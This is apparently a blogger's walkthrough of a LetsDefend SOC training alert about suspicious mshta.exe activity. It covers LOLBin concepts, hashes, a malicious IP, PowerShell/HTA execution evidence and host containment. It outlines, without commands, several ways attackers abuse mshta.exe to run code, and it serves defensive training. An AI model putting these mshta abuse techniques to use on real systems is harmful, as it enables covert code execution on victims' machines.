🌟
Noel's Cyberkshetra Blogspace
LinkedIn ProfileGithub ProfilePersonal Blogspot
  • Welcome to my Gitbooks Page
  • 💽Let's Defend Blue Team Walkthroughs
    • SOC164 - Suspicious Mshta Behavior Alert
    • SOC147 - SSH Scan Activity Alert
    • SOC146  -  Phishing Mail Detected Alert
    • SOC145 - Ransomware Detected Alert
    • SOC144  -  New scheduled task created Alert
    • SOC143 - Password Stealer Detected Alert
    • SOC141  -  Phishing URL Detected Alert
    • SOC141 - Phishing URL Detected Alert
    • SOC137 — Malicious File/Script Download Attempt: A Walkthrough
    • SOC109  -  Emotet Malware Detected Alert
    • SOC104 - Malware Detected Alert
    • SOC101  -  Phishing Mail Detected Alert
    • HTTP Basic Auth: Let's Defend DFIR Challenge
    • ShellShock Attack: Let’s Defend Challenge
    • 2021’s 0-Day MSHTML: Let's Defend Lab
  • 🤺BTLO Walkthroughs
    • BTLO: Network Analysis-Web Shell Challenge
    • BTLO: Suspicious USB Stick Challenge
  • 💒WiCYS CyberStart
    • Chapter 1 - Amsterdam A Running Start
      • WiCYS CyberStart (Amsterdam) Challenge 1
      • WiCYS CyberStart (Amsterdam) Challenge 2
      • WiCYS CyberStart (Amsterdam) Challenge 3
      • WiCYS CyberStart (Amsterdam) Challenge 4
    • Chapter 2 - Tokyo Patterns of Behaviour
      • WiCYS CyberStart (Tokyo) Challenge 1
      • WiCYS CyberStart (Tokyo) Challenge 2
      • WiCYS CyberStart (Tokyo) Challenge 3
      • WiCYS CyberStart (Tokyo) Challenge 4
    • Chapter 3 - Barcelona In the thick of it
      • WiCYS CyberStart (Barcelona) Challenge 1
      • WiCYS CyberStart (Barcelona) Challenge 2
      • WiCYS Cyberstart (Barcelona) Challenge 3
      • WiCYS CyberStart (Barcelona) Challenge 4
  • 📕Technical Cyber articles
    • An in-depth analysis of an Intrusion Prevention System
    • DevSecOps-Making a difference from traditional DevOps
    • CVE - 2020–1472 (Zerologon Vulnerability)-Exploitation & Remediation
    • Computer Forensics Acquisition
    • Cyber Hygiene Tips
    • Hack your System - Linux Edition
    • Markovian Parallax Denigrate-Breaking the cipher
    • SIEM-Incorporating Incident Response into Network Security
    • Social Engineering-A leading cause for vulnerability occurrence
    • Report Writing in Digital & Multimedia Forensics
    • Zero-Day Vulnerabilities: A short overview
    • Zero Trust Network Access-A solution to Network Security
  • 🧑‍💻Hack The Box : Starting Point Machines
    • Meow
    • Fawn
    • Dancing
    • Redeemer
Powered by GitBook
On this page
  • Introduction to the Alert
  • What are Living-off-the-land binaries (LOLBins)?
  • Identify the Binary
  • Determine Suspicious Activity
  • Enumeration - About the binary
  • How does the binary operate?
  • What is the Suspicious Activity?
  • Who Performed the Activity?
  • Containment
  • Add Artifacts
  • ​Analyst's Notes
  • Alert Scorecard
  • Summary of the alert
  • Conclusion
  • Your opinion matters
  1. Let's Defend Blue Team Walkthroughs

SOC164 - Suspicious Mshta Behavior Alert

Analysis of the malicious nature of mshta.exe, a binary signed by Microsoft

PreviousLet's Defend Blue Team WalkthroughsNextSOC147 - SSH Scan Activity Alert

Last updated 1 year ago

Hello, aspiring blue teamers.Hope you are keeping yourselves hale and hearty

Welcome to this blog entry, as we will be tackling the “SOC164 — Suspicious Mshta Behaviour” alert on the Let’s Defend platform. It was vastly different from the other alerts that I have previously solved on this platform

Let’s jump headfirst into it.

NOTE: Always remember to investigate alerts from Let’s Defend, on a VM.

Introduction to the Alert

Alert particulars provided to the analyst:-

Create the case

Start the playbook

What are Living-off-the-land binaries (LOLBins)?

A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

Identify the Binary

Determine which binary is supplied by the operating system but is also home to suspicious activities. To do this, you can resort to the alert details on the Monitoring page or Endpoint Security.

Determine Suspicious Activity

Previously, you found the related binary. Now, we’d like you to determine whether it was used for malicious purposes. You can use the link below to determine how legal binary can be used to perform malicious activities.

There are some characteristics common to command lines:

They often have a file-path or other artifact as one of the arguments, that changes based on the user environment or machine, such as usernames or system GUIDs in file paths. The order of arguments in the command change, or a single argument has a slightly different value. They can have randomly generated strings in embedded URLs or file paths. They can be obfuscated on purpose by attackers (variable assignment, invocation of string expressions created on the fly, etc). (list source: sophos.com)

Is the current activity suspicious?

Enumeration - About the binary

Before we start the investigation, let's try to know more about the mshta.exe binary

To start, it is a signed, native Microsoft binary that already exists on Windows that can execute code in a variety of ways, and in today’s living off the land culture that attackers love, this makes it a prime application of interest since code execution can be proxied through it.

How does the binary operate?

There are four primary methods by which adversaries leverage Mshta to execute arbitrary VBScript and JScript:

  • Inline via an argument passed in the command line to Mshta

Let's return to the platform.

Probing the Process logs of the host, we can find that the binary -mshta.exe did indeed run. A MD5 hash is attached with the instance

MD5 Hash of .exe = 0b4340ed812dc82ce636c00fa5c9bef2

We are given further evidence that the payload was run, in CLI mode aided by a Powershell script (Ps1.hta)

Related hash of .ps1 = 6685c433705f558c5535789234db0e5a

Next, we proceed to check out the 'Log Management' section, to find any network traffic logs corresponding to the victim's IP

We got 2 hits, but only 1 fit the bill. Seems like the binary was accessed from the malicious IP - 193.142.58.23

When expanding the Process list, we can find an instance of Powershell being executed.

We read earlier that one of the methods in which mshta.exe operates is by executing in an HTA file. So, this means that mshta.exe is indeed being executed for malicious purposes

Hence, we can mark it as Suspicious

Event marked as suspicious

What is the Suspicious Activity?

What is the purpose of suspicious activities, performed with legal binaries for this incident?

From our initial research on the mshta binary, we found that it is mostly exploited to remotely execute HTML pages

Let's select 'Execute' from the options above

Execute

Who Performed the Activity?

Who performed the suspicious/malicious activity using a binary? It would be helpful to control the binary’s parent process.

So the attack was supposedly done by a person (threat actor) and not by malicious software

User

Containment

Please go to the “EDR” page and contain the user machine!

Let's proceed to contain the victim host

We have successfully contained the host to prevent the spread of threats on the Let’s Defend network

Add Artifacts

Let’s proceed to submit evidence collected so far, that is relevant to the attack

​Analyst's Notes

Finish the playbook

Close the alert

Alert Scorecard

This case was fascinating and I was double happy with the fact that I got all answers right!

Every alert solved is a step towards perfection and I am pretty happy with the score I received.

Summary of the alert

The SOC Analyst was presented with a suspected binary file that was being used by threat actors to perform remote code execution. With the availability of networking logs and command history, from the victim host, we were able to find the attack vector (Powershell CLI execution), used to conduct the remote attack.

Further analysis was performed on the binary file to find if it had any links to existing malware.It was found that no such association existed. The vulnerability presented in this case was the usage of binaries being signed by trusted entities(in this case Microsoft), which was in turn, being used by attackers to conduct attacks

Conclusion

Thank you for reading this blog entry, and stay tuned as I try to close down more SOC alerts……

Your opinion matters

My audience has a voice. Feel free to reach out to me, on my socials (links are on top of this page) for any queries to be addressed. Dropping a sweet message would make my day

Let your opinion about this write-up be known, by selecting any one of the emojis below!

(Definition: )

According to ,

According to ,

File-based execution via an

By calling the export function of mshtml.dll with as an alternative to mshta.exe

Let’s have a look at , to identify any characteristics of the binary.Looking it up, we can find the execution methods it employs.They cover languages like JavaScript and VBScript

By analyzing the MD5 hash of the binary on , we can conclude that it is not associated with any malware strain. Joe Sandbox can attest to that claim.

💽
talosintelligence.com
LOLBAS Project
Mcafee
Red Canary
HTML Application (HTA) file
COM-based execution for lateral movement
RunHTMLApplication
rundll32.exe
LOLBAS
VirusTotal